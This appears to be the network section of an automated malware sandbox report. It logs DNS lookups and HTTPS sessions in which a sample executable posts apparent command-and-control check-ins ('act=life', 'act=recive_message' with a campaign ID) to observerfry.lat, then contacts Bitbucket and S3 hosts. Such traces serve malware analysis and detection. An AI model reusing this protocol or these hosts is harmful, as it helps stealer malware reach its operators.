Dec 23, 2024 08:04:37.397635937 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.400420904 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.400444031 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.400482893 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.400501966 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.400516033 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.404280901 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.404306889 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.404365063 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.404378891 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.404396057 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.404416084 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.407232046 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.407254934 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.407289028 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.407301903 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.407326937 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.407341003 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.426021099 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.426064014 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.578531981 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.578568935 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.578613043 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.578614950 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.578644991 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.578670979 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.581382990 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.581407070 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.581489086 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.581506014 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.584537029 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.584559917 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.584625959 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.584642887 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.584652901 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.587908030 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.587946892 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.587971926 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.588057995 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.588083982 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.588125944 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.590820074 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.590846062 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.590945005 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.590962887 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.591002941 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.591587067 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.594620943 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.594641924 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.594727993 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.594746113 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.597603083 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.597630024 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.597698927 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.597718954 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.597735882 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.601227045 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.601267099 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.601329088 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.601345062 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.601373911 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.601398945 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.655606031 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.771877050 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.771909952 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.771938086 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.771975994 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.772003889 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.772023916 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.775451899 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.775485039 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.775516033 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.775552034 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.775568008 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.782951117 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.782993078 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.783024073 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.783051014 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.783077002 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.783087969 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.785234928 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.785260916 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.785300970 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.785304070 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.785329103 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.785342932 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.785342932 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.786883116 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.786909103 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.786942005 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.786968946 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.786983967 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.788361073 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.788383007 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.788413048 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.788434982 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.788450956 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.791753054 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.791789055 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.791834116 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.791866064 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.791893005 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.791913033 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.792826891 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.817126036 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.843445063 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.962599039 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.962627888 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.962682962 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.962691069 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.962723017 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.962737083 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.965715885 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.965775013 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.965789080 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.965805054 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.965836048 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.969160080 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.969216108 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.969257116 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.969273090 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.969285011 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.972145081 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.972193956 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.972235918 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.972244978 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.972264051 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.975713015 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.975759029 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.975804090 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.975812912 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.975882053 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
Dec 23, 2024 08:04:37.978818893 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.978872061 CET | 443 | 49764 | 52.217.18.140 | 192.168.2.10
Dec 23, 2024 08:04:37.978895903 CET | 49764 | 443 | 192.168.2.10 | 52.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.978919029 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.978934050 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.982342005 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.982377052 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.982408047 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.982417107 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.982429028 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.982456923 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.985584021 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.985601902 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.985681057 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.985688925 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.985733032 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:37.985975981 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:37.987473011 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.019061089 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.156265974 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.156296015 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.156331062 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.156392097 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.156424046 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.156439066 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.161396027 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.161417007 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.161470890 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.161489964 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.161509037 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.165436029 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.165451050 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.165493011 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.165517092 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.165544033 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.165564060 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.165586948 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.165606022 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.225461006 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.254441977 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.465023994 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.465056896 CET4434976452.217.18.140192.168.2.10
                                                                                                                                                                    Dec 23, 2024 08:04:38.465101004 CET49764443192.168.2.1052.217.18.140
                                                                                                                                                                    Dec 23, 2024 08:04:38.465106964 CET4434976452.217.18.140192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 08:04:08.808532000 CET | 52264 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 08:04:08.946300030 CET | 53 | 52264 | 1.1.1.1 | 192.168.2.10
Dec 23, 2024 08:04:31.457187891 CET | 61567 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 08:04:31.594264984 CET | 53 | 61567 | 1.1.1.1 | 192.168.2.10
Dec 23, 2024 08:04:33.674592018 CET | 61810 | 53 | 192.168.2.10 | 1.1.1.1
Dec 23, 2024 08:04:33.963689089 CET | 53 | 61810 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 08:04:08.808532000 CET | 192.168.2.10 | 1.1.1.1 | 0xf5d5 | Standard query (0) | observerfry.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:31.457187891 CET | 192.168.2.10 | 1.1.1.1 | 0xaa87 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:33.674592018 CET | 192.168.2.10 | 1.1.1.1 | 0x91e6 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 08:04:08.946300030 CET | 1.1.1.1 | 192.168.2.10 | 0xf5d5 | No error (0) | observerfry.lat | | 104.21.36.201 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:08.946300030 CET | 1.1.1.1 | 192.168.2.10 | 0xf5d5 | No error (0) | observerfry.lat | | 172.67.199.72 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:31.594264984 CET | 1.1.1.1 | 192.168.2.10 | 0xaa87 | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:31.594264984 CET | 1.1.1.1 | 192.168.2.10 | 0xaa87 | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:31.594264984 CET | 1.1.1.1 | 192.168.2.10 | 0xaa87 | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:33.963689089 CET | 1.1.1.1 | 192.168.2.10 | 0x91e6 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 08:04:33.963689089 CET | 1.1.1.1 | 192.168.2.10 | 0x91e6 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 08:04:33.963689089 CET | 1.1.1.1 | 192.168.2.10 | 0x91e6 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.18.140 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:33.963689089 CET | 1.1.1.1 | 192.168.2.10 | 0x91e6 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.98.100 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:33.963689089 CET | 1.1.1.1 | 192.168.2.10 | 0x91e6 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.138.1 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:33.963689089 CET | 1.1.1.1 | 192.168.2.10 | 0x91e6 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.92.156 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:33.963689089 CET | 1.1.1.1 | 192.168.2.10 | 0x91e6 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.172.89 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:33.963689089 CET | 1.1.1.1 | 192.168.2.10 | 0x91e6 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.233.209 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:33.963689089 CET | 1.1.1.1 | 192.168.2.10 | 0x91e6 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.162.233 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:04:33.963689089 CET | 1.1.1.1 | 192.168.2.10 | 0x91e6 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.20.54 | A (IP address) | IN (0x0001) | false
• observerfry.lat
• bitbucket.org
• bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49701 | 104.21.36.201 | 443 | 7200 | C:\Users\user\Desktop\Yh6fS6qfTE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:04:10 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: observerfry.lat
2024-12-23 07:04:10 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-23 07:04:10 UTC | 1121 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:04:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=boosfpv5e3lr8emnqfhc1bd8vl; expires=Fri, 18 Apr 2025 00:50:49 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qx9KnLD%2BaPmG1AmR9JFjW8oTXGj%2B79YSwITY4o69qJ19je7wouZfeAFImsF51xi3nRv9FYaS1HZMuXfwjAewtpmuR6nnVFM4irBQKJPCJYa5UG7JaCouC0D8Dqwtph8ull4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f667ef94856440e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1548&rtt_var=611&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1747456&cwnd=236&unsent_bytes=0&cid=a2c58276354dd315&ts=776&x=0"
2024-12-23 07:04:10 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 07:04:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49703 | 104.21.36.201 | 443 | 7200 | C:\Users\user\Desktop\Yh6fS6qfTE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:04:12 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: observerfry.lat
2024-12-23 07:04:12 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-23 07:04:12 UTC | 1121 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:04:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=r7jbuiu1grmjdbrp41h40jc5dn; expires=Fri, 18 Apr 2025 00:50:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2FJhceBAAbICAZgl1kQC7jB4vBliqvCsxZoX1V7MUhJYYCcs6vKpGhwLsIY7TJt3f1Cn%2FQyw6LbNXSHCqN0Zdlo690XgrRm7UVzcngPdQhaO3uCwvE3ka7yS7uhhLbZr2P0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f667f05b88d0cc4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1782&min_rtt=1729&rtt_var=686&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1688837&cwnd=147&unsent_bytes=0&cid=d109dc3d5b01045e&ts=776&x=0"
                                                                                                                                                                    2024-12-23 07:04:12 UTC248INData Raw: 31 34 37 66 0d 0a 77 4f 50 6e 57 2f 66 49 76 31 66 59 6b 6a 5a 36 41 6d 75 72 73 6a 79 58 46 6d 2b 4e 47 43 34 2f 30 46 48 50 74 70 69 71 4f 74 69 37 77 5a 46 35 7a 66 79 54 64 61 76 33 46 45 42 32 47 64 37 58 45 4c 56 33 43 36 38 69 53 46 36 38 49 71 71 61 75 74 78 58 2b 76 71 46 68 6a 65 45 72 5a 4e 31 76 65 6f 55 51 46 6b 51 69 64 64 53 74 53 78 4e 36 48 4a 4d 58 72 77 7a 72 74 33 33 32 6c 61 37 71 49 2b 41 4d 35 4b 72 32 7a 61 30 2f 31 4d 66 5a 77 72 42 33 46 58 36 66 67 4b 76 4e 41 78 61 71 6e 50 31 6c 4e 58 50 54 72 6d 4e 67 70 51 77 31 62 57 54 4c 50 72 33 57 46 67 34 53 63 72 58 58 76 74 77 43 2b 5a 77 52 6c 65 30 4d 71 76 63 36 4d 4e 63 73 4b 69 42 67 7a 4b 59 6f 73 38 37 76 76 68 59 47 57 30 4b 69 5a 34 65 38 6d 78 4e 74 7a
                                                                                                                                                                    Data Ascii: 147fwOPnW/fIv1fYkjZ6AmursjyXFm+NGC4/0FHPtpiqOti7wZF5zfyTdav3FEB2Gd7XELV3C68iSF68IqqautxX+vqFhjeErZN1veoUQFkQiddStSxN6HJMXrwzrt332la7qI+AM5Kr2za0/1MfZwrB3FX6fgKvNAxaqnP1lNXPTrmNgpQw1bWTLPr3WFg4ScrXXvtwC+ZwRle0Mqvc6MNcsKiBgzKYos87vvhYGW0KiZ4e8mxNtz
